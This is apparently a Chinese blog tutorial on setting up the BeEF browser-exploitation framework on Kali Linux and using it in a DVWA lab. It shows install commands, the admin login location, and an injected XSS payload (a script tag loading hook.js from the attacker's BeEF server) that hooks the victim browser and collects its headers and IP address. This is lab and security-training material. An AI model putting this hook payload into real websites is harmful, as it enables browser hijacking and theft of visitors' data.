在kali环境下安装Beef-Xss靶场搭建

目录

一、更新安装包

二、安装beef-xss

三、启动Beef-Xss工具

1、查看hook.js

2、查看后台登录地址

3、查看用户名和登录密码

4、登录页面

[5、点击 Hook me:将配置的页面导入BEEF中](#5、点击 Hook me:将配置的页面导入BEEF中)


一、更新安装包

┌──(root㉿kali)-[/home/kali]

└─# apt-get update

二、安装beef-xss

┌──(root㉿kali)-[/home/kali]

└─# apt-get install beef-xss

三、启动Beef-Xss工具

第一次启动会提示你需要输入密码

1、查看hook.js

http://192.168.17.130:3000/hook.js

可见代码之复杂,功能之多

2、查看后台登录地址

http://192.168.17.130:3000/ui/authentication

3、查看用户名和登录密码

┌──(root㉿kali)-[/home/kali]

└─# cd /usr/share/beef-xss

┌──(root㉿kali)-[/usr/share/beef-xss]

└─# ls -al

┌──(root㉿kali)-[/usr/share/beef-xss]

└─# vim /etc/beef-xss/config.yaml

4、登录页面

5、点击 Hook me:将配置的页面导入BEEF中

在DVWA的反射型XSS中注入BEEF配置页面hook.js

<script src="//192.168.17.130:3000/hook.js">

提交后:

此时BEEF中监控已经上线:

可获取http请求头,服务器类型,IP地址等信息

攻击连接意图:

相关推荐
安全系统学习3 天前
网络安全最新XSS漏洞
网络·安全·web安全·网络安全·xss
吾即是光6 天前
Xss挑战(跨脚本攻击)
前端·xss
渗透测试老鸟-九青6 天前
通过组合Self-XSS + CSRF得到存储型XSS
服务器·前端·javascript·数据库·ecmascript·xss·csrf
morris1316 天前
【SpringBoot】使用过滤器进行XSS防御
spring boot·xss·过滤器
fkalis8 天前
【海外SRC漏洞挖掘】谷歌语法发现XSS+Waf Bypass
前端·xss
渗透测试老鸟-九青8 天前
通过投毒Bingbot索引挖掘必应中的存储型XSS
服务器·前端·javascript·安全·web安全·缓存·xss
dal118网工任子仪10 天前
xss的过滤和绕过(2)
笔记·学习·计算机网络·网络安全·xss
dal118网工任子仪11 天前
web安全漏洞之xss(1)
笔记·学习·web安全·网络安全·xss
Wh1teR0se11 天前
ctfshow(328)--XSS漏洞--存储型XSS
前端·xss
IT猫咪酱11 天前
XSS过滤器Filter实现
java·springboot·xss